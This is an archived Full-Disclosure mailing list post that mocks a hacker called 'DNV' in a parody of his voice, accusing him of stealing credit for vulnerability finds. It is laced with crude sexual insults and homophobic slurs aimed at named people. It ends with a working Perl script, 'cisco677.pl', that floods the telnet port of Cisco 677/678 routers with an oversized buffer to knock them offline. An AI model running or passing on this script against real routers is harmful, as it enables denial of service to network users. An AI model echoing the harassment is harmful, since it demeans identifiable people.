lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: dnv at hushmail.com (dnv@...hmail.com)
Subject: Cisco exploit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

hey all.. this is i the l33t hacker DNV

i am the best hacker in denmark and i write to all of you to tell u about
some very exciting security issues i have not found.

once i worked for a very big ISP in denmark, cybercity, where i tested
security. I told them "1'm 1337 g1v3 m3 m0r3 m0n3y" but they did not??
they fired me??.. i do not understand why they fired the 1337 DNV..

But i had some inside information on cybercity, other people working
there found a security hole in cisco 667.. so i smacked my name on it
and send it to all the big mailinglists... hahaha i showed the world
that i am 1337.

I have a dream to get on TV like all the other 1337 hacker, so i give
blowjobs to any jounalists that will listen to me...
and once at a 2600 meeting, 2600 is so cool and very 1337, i meet another
hacker and he showed me how to hack netpoint on the big hotels to get
free internet.
So once again i smacked my name and released it on the internet, and
told safe2day, the most 1337 security site on the net... hahaha i showed
all people that i am 1337.

some people say that is was a little bitch and was afraid that we would
get in to trouble while we where fooling around with netpoint in the
hotal lobby, and that i keept saying shit like "come on lest go, before
someone sees us" and if i had not been for the others nothing would had
happend... BUT THEY ARE LIEING, they heat me because i got credit for
the hack.

To all the people at HAL2001 i was the gay dork running aroung in the
black "the party" jacket. The party is cool the lamest gamer party in
all of europa and sometimes i get small admin jobs.. cause after i got
fired i got a new job installing windows boxes, that is very 1337, but
it does not pay well.. so i have to suck alot of dick until the day i
get real job so i can move out of my mothers house and get my one place.

Guess what.. it's time to tell you all about the newest member of #dkw-
assstuffing, the biggest and most 1337 hacker #chan in denmark. we all
have mad ./ skill and trade lots of warez.. DON'T FUCK WITH US!!!

welcome to moro^hning_wood.. a true hacker

his activity on Full Disclosure and his allover 1337'ness is proof that
he is a true #asstuffing member!
and we are looking forward to learn more about the 1337 xss that you
master 100%moroning wood you are just to fucking 1337 we love you!!!

this is all for now, and remember if you hear the DNV is a credit stealer
it is a lie!

- ---------------------------------------------------------------------
- ---
Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
put public on www.deadbeat.dk on 5-5-2003.
Thanks to all from DKW-ssstuffing for testing.

A warm night i was coding and lisen to some german tecno music trying
to
find my penis.

I've was also trying to dos hackersnacks for making me so damn fat :(
But then I put the wrong IP into my scrip my ADSL router lost the
Internet connection.

I had no clue what happend, so i started to play with my penis.

I asked around in #2600dk and sniffy told me that he and padde would
stop
assfucking and help if i send them somie pic's of my sexy naked body..
no problem there..

i never learned what the problem was but here is a 1337 exploit

- --------------------cisco677.pl------------------
#!/usr/bin/perl

# close your Cisco 677 up on the Telnet server!
# Made for fun only!  port 23 is the Telnet server port on the router
# By DNV  THX to DKW-asstuffing

use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
                    Proto       => "tcp",
                    PeerAddr    => $args{s},
                    PeerPort    => "(23)",
                ) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj8b13QACgkQ4mqq9+Uor6uFggCeIlCyN1D0kwFOyPpPrPZxg09QKVYA
oJEKwnq0dyOw2ckm2PpwRjODmCdw
=VR6f
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ